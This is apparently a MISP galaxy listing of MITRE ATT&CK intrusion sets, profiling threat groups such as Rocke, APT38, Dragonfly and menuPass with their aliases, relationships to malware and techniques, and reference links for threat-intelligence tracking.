[Rocke](https://attack.mitre.org/groups/G0106) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://attack.mitre.org/groups/G0106) comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://attack.mitre.org/groups/G0106) and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Rocke - G0106"

Rocke - G0106 is also known as:

  • Rocke

Table 7089. Table References

Links

https://attack.mitre.org/groups/G0106

https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html

DragonOK - G0017

[DragonOK](https://attack.mitre.org/groups/G0017) is a threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, [DragonOK](https://attack.mitre.org/groups/G0017) is thought to have a direct or indirect relationship with the threat group [Moafee](https://attack.mitre.org/groups/G0002). (Citation: Operation Quantum Entanglement) It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT. (Citation: New DragonOK)

The tag is: misp-galaxy:mitre-intrusion-set="DragonOK - G0017"

DragonOK - G0017 is also known as:

  • DragonOK

DragonOK - G0017 has relationships with:

  • similar: misp-galaxy:threat-actor="DragonOK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Moafee - G0002" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"

Table 7090. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/

https://attack.mitre.org/groups/G0017

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf

Orangeworm - G0071

[Orangeworm](https://attack.mitre.org/groups/G0071) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage.(Citation: Symantec Orangeworm April 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Orangeworm - G0071"

Orangeworm - G0071 is also known as:

  • Orangeworm

Table 7091. Table References

Links

https://attack.mitre.org/groups/G0071

https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia

Whitefly - G0107

[Whitefly](https://attack.mitre.org/groups/G0107) is a cyber espionage group that has been operating since at least 2017. The group has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information. The group has been linked to an attack against Singapore’s largest public health organization, SingHealth.(Citation: Symantec Whitefly March 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Whitefly - G0107"

Whitefly - G0107 is also known as:

  • Whitefly

Table 7092. Table References

Links

https://attack.mitre.org/groups/G0107

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore

SideCopy - G1008

[SideCopy](https://attack.mitre.org/groups/G1008) is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghani government personnel, since at least 2019. [SideCopy](https://attack.mitre.org/groups/G1008)'s name comes from its infection chain that tries to mimic that of [Sidewinder](https://attack.mitre.org/groups/G0121), a suspected Indian threat group.(Citation: MalwareBytes SideCopy Dec 2021)

The tag is: misp-galaxy:mitre-intrusion-set="SideCopy - G1008"

SideCopy - G1008 is also known as:

  • SideCopy

Table 7093. Table References

Links

https://attack.mitre.org/groups/G1008

https://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure

Naikon - G0019

[Naikon](https://attack.mitre.org/groups/G0019) is assessed to be a state-sponsored cyber espionage group attributed to the Chinese People’s Liberation Army’s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020).(Citation: CameraShy) Active since at least 2010, [Naikon](https://attack.mitre.org/groups/G0019) has primarily conducted operations against government, military, and civil organizations in Southeast Asia, as well as against international bodies such as the United Nations Development Programme (UNDP) and the Association of Southeast Asian Nations (ASEAN).(Citation: CameraShy)(Citation: Baumgartner Naikon 2015)

While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: Baumgartner Golovkin Naikon 2015)

The tag is: misp-galaxy:mitre-intrusion-set="Naikon - G0019"

Naikon - G0019 is also known as:

  • Naikon

Naikon - G0019 has relationships with:

  • similar: misp-galaxy:threat-actor="Naikon" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT30 - G0013" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-tool="netsh - S0108" with estimative-language:likelihood-probability="almost-certain"

Table 7094. Table References

Links

http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf

https://attack.mitre.org/groups/G0019

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

https://securelist.com/the-naikon-apt/69953/

Silence - G0091

[Silence](https://attack.mitre.org/groups/G0091) is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank’s Automated Workstation Client, ATMs, and card processing.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)

The tag is: misp-galaxy:mitre-intrusion-set="Silence - G0091"

Silence - G0091 is also known as:

  • Silence

  • Whisper Spider

Table 7095. Table References

Links

https://attack.mitre.org/groups/G0091

https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://securelist.com/the-silence/83009/

APT3 - G0022

[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China’s Ministry of State Security.(Citation: FireEye Clandestine Wolf)(Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.(Citation: Symantec Buckeye)

In 2017, MITRE developed an APT3 Adversary Emulation Plan.(Citation: APT3 Adversary Emulation Plan)

The tag is: misp-galaxy:mitre-intrusion-set="APT3 - G0022"

APT3 - G0022 is also known as:

  • APT3

  • Gothic Panda

  • Pirpi

  • UPS Team

  • Buckeye

  • Threat Group-0110

  • TG-0110

APT3 - G0022 has relationships with:

  • similar: misp-galaxy:threat-actor="APT3" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"

Table 7096. Table References

Links

http://pwc.blogs.com/cyber_security_updates/2015/07/pirpi-scanbox.html

http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf

https://attack.mitre.org/groups/G0022

https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html

https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html

https://www.recordedfuture.com/chinese-mss-behind-apt3/

APT38 - G0082

[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017)

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:mitre-intrusion-set="APT38 - G0082"

APT38 - G0082 is also known as:

  • APT38

  • NICKEL GLADSTONE

  • BeagleBoyz

  • Bluenoroff

  • Stardust Chollima

APT38 - G0082 has relationships with:

  • similar: misp-galaxy:360net-threat-actor="Lazarus - APT-C-26" with estimative-language:likelihood-probability="likely"

Table 7097. Table References

Links

https://attack.mitre.org/groups/G0082

https://content.fireeye.com/apt/rpt-apt38

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://securelist.com/lazarus-under-the-hood/77908/

https://us-cert.cisa.gov/ncas/alerts/aa20-239a

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/

https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and

https://www.secureworks.com/research/threat-profiles/nickel-gladstone

TA459 - G0062

[TA459](https://attack.mitre.org/groups/G0062) is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)

The tag is: misp-galaxy:mitre-intrusion-set="TA459 - G0062"

TA459 - G0062 is also known as:

  • TA459

TA459 - G0062 has relationships with:

  • similar: misp-galaxy:threat-actor="TA459" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"

Table 7098. Table References

Links

https://attack.mitre.org/groups/G0062

https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts

MONSOON - G0042

The tag is: misp-galaxy:mitre-intrusion-set="MONSOON - G0042"

MONSOON - G0042 has relationships with:

  • similar: misp-galaxy:threat-actor="QUILTED TIGER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Patchwork - G0040" with estimative-language:likelihood-probability="likely"

Table 7099. Table References

Links

https://attack.mitre.org/groups/G0042

CopyKittens - G0052

[CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip.(Citation: ClearSky CopyKittens March 2017)(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)

The tag is: misp-galaxy:mitre-intrusion-set="CopyKittens - G0052"

CopyKittens - G0052 is also known as:

  • CopyKittens

CopyKittens - G0052 has relationships with:

  • similar: misp-galaxy:threat-actor="CopyKittens" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1086" with estimative-language:likelihood-probability="almost-certain"

Table 7100. Table References

Links

http://www.clearskysec.com/copykitten-jpost/

http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf

https://attack.mitre.org/groups/G0052

https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf

Honeybee - G0072

[Honeybee](https://attack.mitre.org/groups/G0072) is a campaign led by an unknown actor that targets humanitarian aid organizations and has been active in Vietnam, Singapore, Argentina, Japan, Indonesia, and Canada. It has been an active operation since August of 2017 and as recently as February 2018. (Citation: McAfee Honeybee)

The tag is: misp-galaxy:mitre-intrusion-set="Honeybee - G0072"

Honeybee - G0072 is also known as:

  • Honeybee

Table 7101. Table References

Links

https://attack.mitre.org/groups/G0072

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/

APT33 - G0064

[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)

The tag is: misp-galaxy:mitre-intrusion-set="APT33 - G0064"

APT33 - G0064 is also known as:

  • APT33

  • HOLMIUM

  • Elfin

APT33 - G0064 has relationships with:

  • similar: misp-galaxy:threat-actor="APT33" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1192" with estimative-language:likelihood-probability="almost-certain"

Table 7102. Table References

Links

https://attack.mitre.org/groups/G0064

https://www.brighttalk.com/webcast/10703/275683

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

APT34 - G0057

APT34 is an Iranian cyber espionage group that has been active since at least 2014. The group has targeted a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. APT34 loosely aligns with public reporting related to OilRig, but may not wholly align due to companies tracking threat groups in different ways. (Citation: FireEye APT34 Dec 2017)

The tag is: misp-galaxy:mitre-intrusion-set="APT34 - G0057"

APT34 - G0057 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1086" with estimative-language:likelihood-probability="almost-certain"

Table 7103. Table References

Links

https://attack.mitre.org/groups/G0057

Group5 - G0043

[Group5](https://attack.mitre.org/groups/G0043) is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. [Group5](https://attack.mitre.org/groups/G0043) has used two commonly available remote access tools (RATs), [njRAT](https://attack.mitre.org/software/S0385) and [NanoCore](https://attack.mitre.org/software/S0336), as well as an Android RAT, DroidJack. (Citation: Citizen Lab Group5)

The tag is: misp-galaxy:mitre-intrusion-set="Group5 - G0043"

Group5 - G0043 is also known as:

  • Group5

Group5 - G0043 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7104. Table References

Links

https://attack.mitre.org/groups/G0043

https://citizenlab.ca/2016/08/group5-syria/

FIN5 - G0053

[FIN5](https://attack.mitre.org/groups/G0053) is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. (Citation: FireEye Respond Webinar July 2017) (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)

The tag is: misp-galaxy:mitre-intrusion-set="FIN5 - G0053"

FIN5 - G0053 is also known as:

  • FIN5

FIN5 - G0053 has relationships with:

  • uses: misp-galaxy:mitre-malware="FLIPSIDE - S0173" with estimative-language:likelihood-probability="almost-certain"

Table 7105. Table References

Links

https://attack.mitre.org/groups/G0053

https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?

https://www.youtube.com/watch?v=fevGZs0EQu8

https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html

Dragonfly - G0035

[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia’s Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017)

The tag is: misp-galaxy:mitre-intrusion-set="Dragonfly - G0035"

Dragonfly - G0035 is also known as:

  • Dragonfly

  • TEMP.Isotope

  • DYMALLOY

  • Berserk Bear

  • TG-4192

  • Crouching Yeti

  • IRON LIBERTY

  • Energetic Bear

Dragonfly - G0035 has relationships with:

  • similar: misp-galaxy:threat-actor="ENERGETIC BEAR" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Trojan.Karagany - S0094" with estimative-language:likelihood-probability="almost-certain"

Table 7106. Table References

Links

http://fortune.com/2017/09/06/hack-energy-grid-symantec/

https://attack.mitre.org/groups/G0035

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks

https://vblocalhost.com/uploads/VB2021-Slowik.pdf

https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions

https://www.dragos.com/threat/dymalloy/

https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet

https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical

https://www.mandiant.com/resources/ukraine-crisis-cyber-threats

https://www.secureworks.com/research/mcmd-malware-analysis

https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector

https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector

APT37 - G0067

[APT37](https://attack.mitre.org/groups/G0067) is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://attack.mitre.org/groups/G0067) has also been linked to the following campaigns between 2016 and 2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018.(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft Jun 2016)(Citation: Talos Group123)

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:mitre-intrusion-set="APT37 - G0067"

APT37 - G0067 is also known as:

  • APT37

  • InkySquid

  • ScarCruft

  • Reaper

  • Group123

  • TEMP.Reaper

  • Ricochet Chollima

APT37 - G0067 has relationships with:

  • similar: misp-galaxy:threat-actor="APT37" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="ScarCruft - APT-C-28" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"

Table 7107. Table References

Links

https://attack.mitre.org/groups/G0067

https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

https://securelist.com/operation-daybreak/75100/

https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

https://www.crowdstrike.com/adversaries/ricochet-chollima/

https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

FIN6 - G0037

[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)

The tag is: misp-galaxy:mitre-intrusion-set="FIN6 - G0037"

FIN6 - G0037 is also known as:

  • FIN6

  • Magecart Group 6

  • ITG08

  • Skeleton Spider

FIN6 - G0037 has relationships with:

  • similar: misp-galaxy:threat-actor="FIN6" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 7108. Table References

Links

https://attack.mitre.org/groups/G0037

https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report

https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/

https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/

https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf

GCMAN - G0036

[GCMAN](https://attack.mitre.org/groups/G0036) is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. (Citation: Securelist GCMAN)

The tag is: misp-galaxy:mitre-intrusion-set="GCMAN - G0036"

GCMAN - G0036 is also known as:

  • GCMAN

GCMAN - G0036 has relationships with:

  • similar: misp-galaxy:threat-actor="GCMAN" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"

Table 7109. Table References

Links

https://attack.mitre.org/groups/G0036

https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/

BlackOasis - G0063

[BlackOasis](https://attack.mitre.org/groups/G0063) is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. (Citation: Securelist BlackOasis Oct 2017) (Citation: Securelist APT Trends Q2 2017) A group known by Microsoft as [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)

The tag is: misp-galaxy:mitre-intrusion-set="BlackOasis - G0063"

BlackOasis - G0063 is also known as:

  • BlackOasis

BlackOasis - G0063 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7110. Table References

Links

https://attack.mitre.org/groups/G0063

https://securelist.com/apt-trends-report-q2-2017/79332/

https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/

https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/

APT39 - G0087

[APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)

The tag is: misp-galaxy:mitre-intrusion-set="APT39 - G0087"

APT39 - G0087 is also known as:

  • APT39

  • ITG07

  • Chafer

  • Remix Kitten

Table 7111. Table References

Links

https://attack.mitre.org/groups/G0087

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://home.treasury.gov/news/press-releases/sm1127

https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764

https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html

https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf

https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt

https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

SilverTerrier - G0083

[SilverTerrier](https://attack.mitre.org/groups/G0083) is a Nigerian threat group that has been observed active since 2014. [SilverTerrier](https://attack.mitre.org/groups/G0083) mainly targets organizations in high technology, higher education, and manufacturing.(Citation: Unit42 SilverTerrier 2018)(Citation: Unit42 SilverTerrier 2016)

The tag is: misp-galaxy:mitre-intrusion-set="SilverTerrier - G0083"

SilverTerrier - G0083 is also known as:

  • SilverTerrier

Table 7112. Table References

Links

https://attack.mitre.org/groups/G0083

https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf

GALLIUM - G0093

[GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022)

The tag is: misp-galaxy:mitre-intrusion-set="GALLIUM - G0093"

GALLIUM - G0093 is also known as:

  • GALLIUM

  • Operation Soft Cell

Table 7113. Table References

Links

https://attack.mitre.org/groups/G0093

https://unit42.paloaltonetworks.com/pingpull-gallium/

https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

Suckfly - G0039

[Suckfly](https://attack.mitre.org/groups/G0039) is a China-based threat group that has been active since at least 2014. (Citation: Symantec Suckfly March 2016)

The tag is: misp-galaxy:mitre-intrusion-set="Suckfly - G0039"

Suckfly - G0039 is also known as:

  • Suckfly

Suckfly - G0039 has relationships with:

  • similar: misp-galaxy:threat-actor="APT22" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1116" with estimative-language:likelihood-probability="almost-certain"

Table 7114. Table References

Links

http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks

http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates

https://attack.mitre.org/groups/G0039

FIN4 - G0085

[FIN4](https://attack.mitre.org/groups/G0085) is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye FIN4 Stealing Insider NOV 2014) [FIN4](https://attack.mitre.org/groups/G0085) is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)

The tag is: misp-galaxy:mitre-intrusion-set="FIN4 - G0085"

FIN4 - G0085 is also known as:

  • FIN4

Table 7115. Table References

Links

https://attack.mitre.org/groups/G0085

https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html

https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf

https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html

menuPass - G0045

[menuPass](https://attack.mitre.org/groups/G0045) is a threat group that has been active since at least 2006. Individual members of [menuPass](https://attack.mitre.org/groups/G0045) are known to have acted in association with the Chinese Ministry of State Security’s (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)

[menuPass](https://attack.mitre.org/groups/G0045) has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.(Citation: Palo Alto menuPass Feb 2017)(Citation: Crowdstrike CrowdCast Oct 2013)(Citation: FireEye Poison Ivy)(Citation: PWC Cloud Hopper April 2017)(Citation: FireEye APT10 April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)

The tag is: misp-galaxy:mitre-intrusion-set="menuPass - G0045"

menuPass - G0045 is also known as:

  • menuPass

  • Cicada

  • POTASSIUM

  • Stone Panda

  • APT10

  • Red Apollo

  • CVNX

  • HOGFISH

menuPass - G0045 has relationships with:

  • similar: misp-galaxy:threat-actor="APT10" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 7116. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/

http://web.archive.org/web/20220810112638/https:/www.accenture.com/t20180423T055005Z_w/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf

https://attack.mitre.org/groups/G0045

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage

https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html

